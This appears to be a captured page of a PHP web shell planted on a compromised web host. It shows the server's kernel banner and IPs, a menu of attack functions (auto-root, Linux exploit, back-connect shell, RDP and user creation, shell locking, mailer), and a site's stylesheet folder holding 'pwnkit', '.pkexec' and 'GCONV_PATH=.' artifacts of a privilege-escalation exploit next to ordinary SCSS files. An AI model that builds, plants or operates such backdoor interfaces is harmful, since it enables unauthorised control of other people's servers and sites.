Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
siddhapu /
public_html /
assets /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.pkexec
[ DIR ]
drwxr-xr-x
?;
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_blog.scss
2.38
KB
-rw-r--r--
_blog_page.scss
29.56
KB
-rw-r--r--
_bradcam.scss
5.33
KB
-rw-r--r--
_color.scss
1.38
KB
-rw-r--r--
_common.scss
16.94
KB
-rw-r--r--
_contact-with-area.scss
464
B
-rw-r--r--
_contact.scss
2.82
KB
-rw-r--r--
_countDown.scss
1.77
KB
-rw-r--r--
_david-droga.scss
4.11
KB
-rw-r--r--
_details_page.scss
278
B
-rw-r--r--
_elements.scss
23.43
KB
-rw-r--r--
_extend.scss
2.53
KB
-rw-r--r--
_footer.scss
4.46
KB
-rw-r--r--
_h1-hero.scss
6.8
KB
-rw-r--r--
_headerMenu.scss
5.98
KB
-rw-r--r--
_mixins.scss
359
B
-rw-r--r--
_overlay.scss
1.03
KB
-rw-r--r--
_project-area.scss
4.12
KB
-rw-r--r--
_services.scss
585
B
-rw-r--r--
_services_section.scss
1.74
KB
-rw-r--r--
_support-company.scss
2.91
KB
-rw-r--r--
_team.scss
1.09
KB
-rw-r--r--
_testimonial.scss
2.75
KB
-rw-r--r--
_variables.scss
2.38
KB
-rw-r--r--
_wantToWork.scss
1.58
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
style.scss
1.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _project-area.scss
.project-area,.about-area,.contact-section{ .project-caption{ .single-project{ position: relative; .project-img{ img{ width: 100%; } } .project-cap{ padding: 20px 20px; background:#fafafa; @include transition(.4s); position: relative; h4{ margin: 0; line-height: 1.2; font-size: 25px; font-weight: 700; a{ color: #0e132a; &:hover{ color: $theme-color; } } } } &:hover{ .project-cap{ } } // plus Btn .plus-btn { position: absolute; right: 16px; top: -22px; display: inline-block; opacity: 0; visibility: hidden; @include transition(.3s); i { color: #161e46; background: transparent; width: 38px; height: 38px; display: inline-block; line-height: 38px; text-align: center; font-size: 15px; margin-left: 10px; -webkit-transition: all .4s ease-out 0s; -moz-transition: all .4s ease-out 0s; -ms-transition: all .4s ease-out 0s; -o-transition: all .4s ease-out 0s; transition: all .4s ease-out 0s; } } // Hover Single &:hover { .project-cap{ background: #00235b; h4{ a{ color: #fff; } } } .plus-btn { opacity: 1; visibility: visible; i { color: #fff; background: #ff5f13; } } } } } // Tabs Button Style .properties__button{ float: right; @media #{$md}{ float: left; } @media #{$sm}{ float: left; } @media #{$xs}{ float: left; } } .nav-tabs .nav-link { border: 0; border-bottom: 2px solid transparent; padding: 10px 20px; @media #{$lg}{ padding: 10px 10px; } @media #{$md}{ padding: 10px 15px; } @media #{$sm}{ padding: 10px 15px; } @media #{$xs}{ padding: 10px 15px; } } .nav-tabs .nav-item.show .nav-link, .nav-tabs .nav-link.active { color: $theme-color; background: none; } .nav-tabs .nav-item { // padding-bottom: 10px; display: block; color: #161e46; font-weight: 500; text-transform: capitalize; font-size: 16px; } .nav-tabs { margin-bottom: 9px; padding-bottom: 0px; position: relative; border: 0; display: flex; justify-content: center; @media #{$md}{ justify-content: start; } @media #{$sm}{ justify-content: start; } @media #{$xs}{ justify-content: start; } } } .tab-pane{ @include transition(.6s); }
Close